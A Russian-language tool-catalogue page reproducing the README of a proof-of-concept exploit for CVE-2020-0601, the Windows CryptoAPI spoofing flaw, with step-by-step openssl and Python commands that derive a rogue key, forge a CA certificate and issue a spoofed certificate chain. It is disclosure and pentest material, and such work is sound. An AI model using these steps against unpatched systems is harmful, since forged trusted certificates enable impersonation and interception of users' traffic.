Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
chainoffools — Эксплойт класса proof-of-concept для уязвимости подмены CVE-2020-0601 в Windows CryptoAPI, демонстрирующий генерацию мошеннического сертификата центра сертификации (CA) с помощью манипуляции ключами на основе эллиптических кривых. | Kitploit
Инструменты/GitHubGitHub/kudelskisecurity/chainoffools
Анализ уязвимостейАнализ КодаЭксплуатацияКриптографияТестирование на Проникновение
GitHubkudelskisecurity/chainoffools

chainoffools

Эксплойт класса proof-of-concept для уязвимости подмены CVE-2020-0601 в Windows CryptoAPI, демонстрирующий генерацию мошеннического сертификата центра сертификации (CA) с помощью манипуляции ключами на основе эллиптических кривых.

Репозиторий
3358133 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CryptoAPI

CVE-2020-0601: эксплуатация уязвимости подмены Windows CryptoAPI. Подробнее в нашем блог-посте.

Установка зависимостей

root@kitploit:~
pip install -U -r requirements.txt

Генерация сертификатов работает с OpenSSL версии до 1.0.2u.

Сертификат CA

Мы использовали USERTrust ECC Certification Authority, но подойдет любой корневой сертификат, работающий на кривой P-384.

Для генерации закрытого ключа, соответствующего открытому ключу из корневого сертификата, мы использовали скрипт gen-key.py (работает с Python 3.6 и выше):

root@kitploit:~
$ ./gen-key.py RootCert.pem 

Ключ можно посмотреть командой:

root@kitploit:~
$ openssl ec -in p384-key-rogue.pem -text

Затем для генерации поддельного CA:

root@kitploit:~
$ openssl req -key p384-key-rogue.pem -new -out ca-rogue.pem -x509 -config ca.cnf -days 500

Далее генерируем следующие закрытый ключ и сертификат:

root@kitploit:~
openssl ecparam -name prime256v1 -genkey -noout -out prime256v1-privkey.pem

openssl req -key prime256v1-privkey.pem -config openssl.cnf -new -out prime256v1.csr

openssl x509 -req -in prime256v1.csr -CA ca-rogue.pem -CAkey p384-key-rogue.pem -CAcreateserial -out client-cert.pem -days 500 -extensions v3_req -extfile openssl.cnf 

Наконец, чтобы получить полную цепочку в одном файле, объединяем сертификаты CA и сервера:

root@kitploit:~
cat client-cert.pem ca-rogue.pem > cert.pem
Скачать инструмент